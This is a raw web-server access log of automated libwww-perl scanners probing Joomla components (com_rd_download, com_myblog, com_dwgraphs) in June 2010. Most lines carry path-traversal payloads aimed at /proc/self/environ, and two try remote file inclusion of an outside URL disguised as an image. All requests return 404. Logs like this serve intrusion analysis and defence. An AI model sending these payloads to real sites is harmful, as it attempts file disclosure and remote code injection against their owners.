174.121.227.168 - - [13/Jun/2010:02:42:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:42:36 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.227.168 - - [13/Jun/2010:02:42:36 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.186.27.166 - - [13/Jun/2010:02:42:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
91.186.27.166 - - [13/Jun/2010:02:42:37 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.186.27.166 - - [13/Jun/2010:02:42:37 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
59.21.247.137 - - [13/Jun/2010:02:42:42 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
209.200.244.57 - - [13/Jun/2010:02:42:48 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.43.133.147 - - [13/Jun/2010:02:42:50 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
200.202.243.41 - - [13/Jun/2010:02:42:54 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
200.202.243.41 - - [13/Jun/2010:02:42:56 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
114.108.151.149 - - [13/Jun/2010:02:42:59 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:42:59 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
188.40.178.145 - - [13/Jun/2010:02:43:08 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
188.40.178.145 - - [13/Jun/2010:02:43:09 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
209.200.244.57 - - [13/Jun/2010:02:43:14 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:43:15 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:43:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:43:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:43:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.225.141.62 - - [13/Jun/2010:02:43:27 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
81.93.240.60 - - [13/Jun/2010:02:43:28 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:02:43:28 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:43:32 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:43:32 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:43:32 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:43:33 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:02:43:33 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.136.63.119 - - [13/Jun/2010:02:43:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:43:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
109.71.41.45 - - [13/Jun/2010:02:43:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:02:43:40 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:02:43:40 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:02:43:42 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:02:43:42 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
94.23.197.156 - - [13/Jun/2010:02:43:44 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:43:44 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
92.103.254.153 - - [13/Jun/2010:02:43:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:43:51 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:43:51 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:43:53 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:43:53 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:43:55 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:43:55 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:43:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:43:56 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:43:56 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.136.63.119 - - [13/Jun/2010:02:44:15 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:02:44:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
208.43.133.147 - - [13/Jun/2010:02:44:16 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
208.43.133.147 - - [13/Jun/2010:02:44:16 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
122.252.7.141 - - [13/Jun/2010:02:44:24 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:44:24 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
92.103.254.153 - - [13/Jun/2010:02:44:25 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:44:25 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:44:26 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:44:26 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
59.21.247.137 - - [13/Jun/2010:02:44:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:44:37 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:44:37 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
67.225.141.62 - - [13/Jun/2010:02:44:38 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
92.103.254.153 - - [13/Jun/2010:02:44:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.225.141.62 - - [13/Jun/2010:02:44:38 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
92.103.254.153 - - [13/Jun/2010:02:44:38 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
59.21.247.137 - - [13/Jun/2010:02:44:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
92.103.254.153 - - [13/Jun/2010:02:44:39 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
59.21.247.137 - - [13/Jun/2010:02:44:39 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
59.21.247.137 - - [13/Jun/2010:02:44:39 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
208.43.133.147 - - [13/Jun/2010:02:44:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
208.43.133.147 - - [13/Jun/2010:02:44:40 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
208.43.133.147 - - [13/Jun/2010:02:44:40 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
92.103.254.153 - - [13/Jun/2010:02:44:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:44:42 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.103.254.153 - - [13/Jun/2010:02:44:43 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.252.2.168 - - [13/Jun/2010:02:44:44 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
87.252.2.168 - - [13/Jun/2010:02:44:45 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
87.252.2.168 - - [13/Jun/2010:02:44:45 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
209.200.244.57 - - [13/Jun/2010:02:44:50 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:44:50 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:02:44:50 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:45:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:45:06 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:45:06 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:45:06 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:45:07 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [13/Jun/2010:02:45:07 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.252.2.168 - - [13/Jun/2010:02:45:14 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
87.252.2.168 - - [13/Jun/2010:02:45:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
87.252.2.168 - - [13/Jun/2010:02:45:26 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
87.252.2.168 - - [13/Jun/2010:02:45:26 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
67.225.141.62 - - [13/Jun/2010:02:45:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.225.141.62 - - [13/Jun/2010:02:45:27 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.225.141.62 - - [13/Jun/2010:02:45:27 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
94.23.197.156 - - [13/Jun/2010:02:45:48 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:45:48 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:50 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:50 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.252.2.168 - - [13/Jun/2010:02:45:52 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
94.23.6.211 - - [13/Jun/2010:02:45:52 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:52 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:54 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:54 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:45:54 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
